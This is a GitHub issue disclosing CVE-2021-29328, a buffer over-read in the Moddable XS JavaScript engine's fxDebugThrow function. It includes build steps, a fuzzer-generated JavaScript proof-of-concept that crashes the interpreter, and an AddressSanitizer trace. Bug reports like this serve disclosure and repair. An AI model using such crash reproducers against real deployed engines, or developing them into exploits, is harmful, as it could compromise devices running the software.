Headline
CVE-2021-29328: over access(fxEnvironmentGetProperty) · Issue #585 · Moddable-OpenSource/moddable
OpenSource Moddable v10.5.0 was discovered to contain buffer over-read in the fxDebugThrow function at /moddable/xs/sources/xsDebug.c.
operating system: ubuntu18.04
compile command: cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc
function getHiddenValue() {
var obj = {};
var nEmw = new RegExp(null);
var oob = 'value';
var fun = eval(str);
nEmw = new Object();
oob = Object.assign('0', Object(521));
var str = 'new String(\'\')';
var fun = eval(str);
let protoWithIndexedAccessors = {};
var j = [];
Object.assign(obj, fun);
var fun = eval(str);
return obj;
}
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = 'constructor';
var extern_arr_vars = [];
let i = 0;
var ijjkkk = 0;
str = ijjkkk < 100000;
function helper(i) {
let a = new Array();
var extern_arr_vars = [];
if (ijjkkk < 100000) {
makeOobString(a, protoWithIndexedAccessors);
}
return a;
var oobString = makeOobString();
}
var j = [];
var fun = eval(str);
Object(fun, hiddenValue);
var oobString = helper();
for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
fun = makeOobString();
}
return oobString;
}
var oobString = makeOobString();
var oobString = makeOobString();
helper(oobString);
let protoWithIndexedAccessors = {};
ASAN:SIGSEGV
=================================================================
==5974==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3b90c5ec8a (pc 0x0000004cbf37 bp 0x7ffe0703b1f0 sp 0x7ffe0703b1c0 T0)
#0 0x4cbf36 in fxDebugThrow /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784
#1 0x42068e in fxThrowMessage /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1251
#2 0x655dea in fxEnvironmentGetProperty /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsType.c:1147
#3 0x5d5e64 in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:2133
#4 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
#5 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
#6 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
#7 0x7f4b855bd82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#8 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784 fxDebugThrow
==5974==ABORTING